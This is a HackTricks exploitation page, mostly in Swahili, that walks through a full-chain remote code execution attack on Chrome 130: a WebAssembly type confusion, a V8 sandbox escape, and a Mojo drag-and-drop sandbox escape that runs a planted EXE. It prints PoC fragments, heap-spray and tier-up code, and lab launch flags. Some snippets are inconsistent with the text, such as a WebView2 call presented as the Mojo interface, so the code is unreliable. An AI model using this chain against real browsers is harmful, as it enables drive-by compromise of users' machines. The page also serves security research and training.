Chrome Exploiting

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Ukurasa huu unatoa muhtasari wa ngazi ya juu lakini wa vitendo wa mtiririko wa kazi wa “full-chain” exploitation dhidi ya Google Chrome 130 kwa kuzingatia mfululizo wa utafiti “101 Chrome Exploitation” (Part-0 — Preface). Lengo ni kuwapa pentesters na exploit-developers msingi mdogo unaohitajika ili kuzalisha tena au kuibadilisha techniques kwa ajili ya utafiti wao wenyewe.

1. Muhtasari wa Usanifu wa Chrome

Kuelewa attack surface kunahitaji kujua wapi code inatekelezwa na sandboxes gani zinatumika.

Mpangilio wa mchakato wa Chrome & sandboxes

```text +-------------------------------------------------------------------------+ | Chrome Browser | | | | +----------------------------+ +-----------------------------+ | | | Renderer Process | | Browser/main Process | | | | [No direct OS access] | | [OS access] | | | | +----------------------+ | | | | | | | V8 Sandbox | | | | | | | | [JavaScript / Wasm] | | | | | | | +----------------------+ | | | | | +----------------------------+ +-----------------------------+ | | | IPC/Mojo | | | V | | | +----------------------------+ | | | | GPU Process | | | | | [Restricted OS access] | | | | +----------------------------+ | | +-------------------------------------------------------------------------+ ```

Ulinzi wa kina wa tabaka:

V8 sandbox (Isolate): ruhusa za kumbukumbu zimepunguzwa ili kuzuia kusoma/kuandika isiyotakikana kutoka JITed JS / Wasm.
Renderer ↔ Browser split imehakikishwa kupitia Mojo/IPC message passing; renderer haina ufikiaji wa asili wa FS/mtandao.
OS sandboxes zinafunga zaidi kila mchakato (Windows Integrity Levels / seccomp-bpf / macOS sandbox profiles).

Mshambuliaji wa mbali kwa hiyo anahitaji tatu primitives mfululizo:

Uharibifu wa kumbukumbu ndani ya V8 ili kupata arbitrary RW inside the V8 heap.
Hitilafu ya pili inayomruhusu mshambuliaji escape the V8 sandbox to full renderer memory.
Kukimbia kwa sandbox kwa mwisho (mara nyingi ni logic badala ya uharibifu wa kumbukumbu) ili kutekeleza code outside of the Chrome OS sandbox.

2. Hatua 1 – WebAssembly Type-Confusion (CVE-2025-0291)

Hitilafu katika TurboFan’s Turboshaft optimisation inatafsiri vibaya WasmGC reference types wakati thamani inapotengenezwa na kutumiwa ndani ya single basic block loop.

Athari:

Compiler inapuuza type-check, ikitenda reference (externref/anyref) kama int64.
Wasm iliyotengenezwa kwa makusudi inaruhusu kuingiliana kwa header ya JS object na data inayodhibitiwa na mshambuliaji → addrOf() & fakeObj() AAW / AAR primitives.

Minimal PoC (excerpt):

(module
(type $t0 (func (param externref) (result externref)))
(func $f (param $p externref) (result externref)
(local $l externref)
block $exit
loop $loop
local.get $p      ;; value with real ref-type
;; compiler incorrectly re-uses it as int64 in the same block
br_if $exit       ;; exit condition keeps us single-block
br   $loop
end
end)
(export "f" (func $f)))

Chochea uimarishaji & spray objects kutoka JS:

const wasmMod = new WebAssembly.Module(bytes);
const wasmInst = new WebAssembly.Instance(wasmMod);
const f = wasmInst.exports.f;

for (let i = 0; i < 1e5; ++i) f({});   // warm-up for JIT

// primitives
let victim   = {m: 13.37};
let fake     = arbitrary_data_backed_typedarray;
let addrVict = addrOf(victim);

Outcome: arbitrary read/write within V8.

3. Hatua ya 2 – Kutoroka kwenye V8 Sandbox (issue 379140430)

Wakati Wasm function inapokuwa tier-up-compiled, a JS ↔ Wasm wrapper inaundwa.

Hitilafu ya signature-mismatch inasababisha wrapper kuandika zaidi ya mwisho wa kitu kinachoaminika Tuple2 wakati Wasm function inapore-optimised wakati bado iko kwenye stack.

Kuandika juu ya nyaya 2 × 64-bit za kitu Tuple2 kunatoa read/write on any address inside the Renderer process, kwa ufanisi kuepuka V8 sandbox.

Hatua muhimu za exploit:

Panga function ili iwe katika hali ya Tier-Up kwa kubadilisha turbofan/baseline code.
Sababisha tier-up huku ukihifadhi reference kwenye stack (Function.prototype.apply).
Tumia Stage-1 AAR/AAW kupata na kuharibu Tuple2 inayojirani.

Utambuzi wa wrapper:

function wrapperGen(arg) {
return f(arg);
}
%WasmTierUpFunction(f);          // force tier-up (internals-only flag)
wrapperGen(0x1337n);

Baada ya uharibifu tunamiliki kipengele kamili cha renderer R/W primitive.

4. Stage 3 – Renderer → OS Sandbox Escape (CVE-2024-11114)

Kiolesura cha IPC cha Mojo blink.mojom.DragService.startDragging() kinaweza kuitwa kutoka kwa Renderer kwa vigezo vya kuaminika kwa sehemu. Kwa kutengeneza muundo wa DragData unaoelekeza kwa njia ya faili yoyote, renderer inamshawishi browser kutekeleza operesheni ya asili drag-and-drop nje ya renderer sandbox.

Kwa kutumia hili vibaya tunaweza kivitendo “drag” EXE hatari (iliyowekwa awali katika eneo linaloweza kuandikwa na kila mtu) kwenda kwenye Desktop, ambapo Windows huendesha aina fulani za faili kiotomatiki mara zinapodondoshwa.

Mfano (iliyorahisishwa):

const payloadPath = "C:\\Users\\Public\\explorer.exe";

chrome.webview.postMessage({
type: "DragStart",
data: {
title: "MyFile",
file_path: payloadPath,
mime_type: "application/x-msdownload"
}
});

Hakuna uharibifu wa kumbukumbu wa ziada unaohitajika – kasoro ya mantiki inatupa utekelezaji wa faili yoyote kwa ruhusa za mtumiaji.

5. Full Chain Flow

Mtumiaji anatembelea ukurasa wa wavuti hatari.
Hatua 1: Moduli ya Wasm inatumia CVE-2025-0291 → V8 heap AAR/AAW.
Hatua 2: Wrapper mismatch inaharibu Tuple2 → escape V8 sandbox.
Hatua 3: startDragging() IPC → escape OS sandbox & execute payload.

Matokeo: Remote Code Execution (RCE) kwenye mwenyeji (Chrome 130, Windows/Linux/macOS).

6. Maandalizi ya Maabara na Debugging

# Spin-up local HTTP server w/ PoCs
npm i -g http-server
git clone https://github.com/Petitoto/chromium-exploit-dev
cd chromium-exploit-dev
http-server -p 8000 -c -1

# Windows kernel debugging
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols

Bendera muhimu unapozindua toleo la maendeleo la Chrome:

chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"

7. Renderer → rasilimali ya kutoroka kernel

Unapo renderer exploit inahitaji kernel pivot ambayo inabaki ndani ya seccomp profile, kutumia vibaya AF_UNIX MSG_OOB sockets ambazo bado zinafikiwa ndani ya sandbox kunatoa njia inayotabirika. Angalia Linux kernel exploitation case-study hapa chini kwa mnyororo wa SKB UAF → kernel RCE:

Af Unix Msg Oob Uaf Skb Primitives

Mambo muhimu

WebAssembly JIT bugs zinaendelea kuwa njia ya kuingia yenye kuaminika – mfumo wa aina bado ni mpya.
Kupata mdudu wa pili wa memory-corruption ndani ya V8 (kwa mfano wrapper mismatch) kunarahisisha sana V8-sandbox escape.
Udhaifu wa logic katika interfaces za Mojo IPC zenye ruhusa mara nyingi unatosha kwa final sandbox escape – zingatia non-memory bugs.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.